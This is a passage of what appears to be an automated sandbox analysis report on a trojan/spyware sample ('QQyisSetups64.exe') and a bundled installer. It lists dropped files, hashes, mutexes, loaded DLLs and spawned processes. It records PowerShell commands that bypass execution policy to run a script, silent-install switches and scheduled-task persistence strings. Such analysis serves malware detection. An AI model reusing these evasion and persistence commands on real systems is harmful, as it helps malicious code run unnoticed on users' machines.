                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF397016_2_00AF3970
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A7FF0016_2_00A7FF00
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A7FF7016_2_00A7FF70
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C65A916 appears 41 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C6930C1 appears 45 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C5DC2CF appears 498 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00B032AD appears 39 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00A7B680 appears 43 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C5DCF3C appears 34 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C5E1300 appears 104 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF453E appears 95 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C68E86C appears 529 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF5421 appears 859 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF4D50 appears 86 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C68E89F appears 107 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF5454 appears 84 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF47DC appears 64 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF548A appears 51 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C65A8A6 appears 43 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00A7B780 appears 70 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AD4164 appears 79 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C65A6EE appears 47 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C5E1E36 appears 42 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00A8CC03 appears 48 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00A88675 appears 259 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00A91BA2 appears 71 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 00AF0230 appears 36 times
                          Source: C:\Users\user\Downloads\inst.exeCode function: String function: 6C68D7CC appears 53 times
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: String function: 03613CBF appears 33 times
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: String function: 03794300 appears 32 times
                          Source: QQyisSetups64.exeStatic PE information: invalid certificate
                          Source: inst[1].exe.3.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                          Source: inst[1].exe.3.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                          Source: inst.exe.3.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                          Source: QQyisSetups64.exeBinary or memory string: OriginalFilenameV vs QQyisSetups64.exe
                          Source: QQyisSetups64.exe.3.drBinary or memory string: OriginalFilenameV vs QQyisSetups64.exe
                          Source: QQyisSetups64.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: inst[1].exe.3.drBinary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG
                          Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@16/34@8/14
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03787B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_03787B70
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03787740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_03787740
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03787620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,6_2_03787620
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,6_2_03786C50
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle,3_2_1000F260
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,6_2_03786150
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AE0145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource,15_2_00AE0145
                          Source: C:\Users\user\Downloads\inst.exeFile created: C:\Program Files (x86)\360Jump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\Desktop\LogsJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_qqyissetups64_Mutex
                          Source: C:\Users\user\Downloads\inst.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                          Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
                          Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 1464
                          Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 2440
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeMutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_qqyissetups64
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeMutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_qqyissetups64_Mutex_user_WinSta0
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtxrbs5i.uns.ps1Jump to behavior
                          Source: Yara matchFile source: QQyisSetups64.exe, type: SAMPLE
                          Source: Yara matchFile source: 3.2.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: QQyisSetups64.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
                          Source: QQyisSetups64.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
                          Source: QQyisSetups64.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
                          Source: QQyisSetups64.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
                          Source: inst.exeString found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
                          Source: inst.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
                          Source: inst.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
                          Source: QQyisSetups64.exeString found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile read: C:\Users\user\Desktop\QQyisSetups64.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\QQyisSetups64.exe "C:\Users\user\Desktop\QQyisSetups64.exe"
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeProcess created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe"
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                          Source: unknownProcess created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                          Source: unknownProcess created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeProcess created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: msv1_0.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: ntlmshared.dllJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: dinput8.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: inputhost.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: devenum.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msdmo.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
